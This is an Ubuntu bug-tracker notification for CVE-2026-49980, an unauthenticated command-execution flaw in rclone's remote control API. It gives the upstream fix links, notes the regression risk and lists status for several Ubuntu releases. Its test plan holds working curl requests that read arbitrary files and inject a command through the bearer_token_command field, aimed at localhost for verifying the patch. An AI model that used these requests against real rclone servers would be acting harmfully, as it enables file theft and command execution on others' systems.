*** This bug is a security vulnerability ***

Public security bug reported:

[ Impact ]

CVE-2026-49980 describes an unauthenticated remote command execution
vulnerability in the rclone remote control (RC) API. An unauthenticated
network attacker who can reach the RC HTTP listener can execute commands
as the rclone process user and read arbitrary files.

[1] https://github.com/rclone/rclone/security/advisories/GHSA-qw24-gh76-8rvv
[2] 
https://github.com/rclone/rclone/commit/2326ea79f7dd93de1f7ba15f02353d40995f06a8
[3] 
https://github.com/rclone/rclone/commit/53f972830c1747cb9636a6342c5308e55672c375

[ Test Plan ]

sudo apt install rclone gridsite-clients

rclone rcd --rc-addr :5572 --rc-serve

# Read arbitrary files
backend=`urlencode ["${HOME}"]`
curl -sS -X GET "http://127.0.0.1:5572/${backend}/.bash_logout";

# Execute arbitrary commands
backend=`urlencode 
"[:webdav,url=blah,vendor=other,bearer_token_command='/usr/bin/touch 
/tmp/rclone_fsget_rce_poc_marker':]"`
curl -sS -X GET "http://127.0.0.1:5572/${backend}/";

stat /tmp/rclone_fsget_rce_poc_marker

# Note that the rcd server must be restarted after the first request in order 
for
# bearer_token_command to be executed again

[ Where problems could occur ]

The fix disables inline-specified remote paths for unauthenticated users
when using rcd [1]. Users relying on this functionality will experience
a regression.

[1] https://rclone.org/docs/#syntax-of-remote-paths

[ Other information ]

53f9728 (the second fix listed in the GHSA) fixes a bug that was
introduced in 3c596f8 (>1.71.0,
https://github.com/rclone/rclone/pull/8699); that commit should be
skipped for all versions of rclone currently available in Ubuntu.

** Affects: rclone (Ubuntu)
     Importance: Medium
     Assignee: Wesley Hershberger (whershberger)
         Status: In Progress

** Affects: rclone (Ubuntu Focal)
     Importance: Undecided
         Status: New

** Affects: rclone (Ubuntu Jammy)
     Importance: Undecided
     Assignee: Wesley Hershberger (whershberger)
         Status: In Progress

** Affects: rclone (Ubuntu Noble)
     Importance: Undecided
     Assignee: Wesley Hershberger (whershberger)
         Status: In Progress

** Affects: rclone (Ubuntu Resolute)
     Importance: Undecided
     Assignee: Wesley Hershberger (whershberger)
         Status: In Progress

** Affects: rclone (Ubuntu Stonking)
     Importance: Medium
     Assignee: Wesley Hershberger (whershberger)
         Status: In Progress

** Also affects: rclone (Ubuntu Stonking)
   Importance: Medium
     Assignee: Wesley Hershberger (whershberger)
       Status: In Progress

** Also affects: rclone (Ubuntu Resolute)
   Importance: Undecided
       Status: New

** Also affects: rclone (Ubuntu Noble)
   Importance: Undecided
       Status: New

** Also affects: rclone (Ubuntu Jammy)
   Importance: Undecided
       Status: New

** Also affects: rclone (Ubuntu Focal)
   Importance: Undecided
       Status: New

** Changed in: rclone (Ubuntu Jammy)
     Assignee: (unassigned) => Wesley Hershberger (whershberger)

** Changed in: rclone (Ubuntu Noble)
     Assignee: (unassigned) => Wesley Hershberger (whershberger)

** Changed in: rclone (Ubuntu Resolute)
     Assignee: (unassigned) => Wesley Hershberger (whershberger)

** Changed in: rclone (Ubuntu Jammy)
       Status: New => In Progress

** Changed in: rclone (Ubuntu Noble)
       Status: New => In Progress

** Changed in: rclone (Ubuntu Resolute)
       Status: New => In Progress

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/2160382

Title:
  CVE-2026-49980

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/rclone/+bug/2160382/+subscriptions


-- 
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

Reply via email to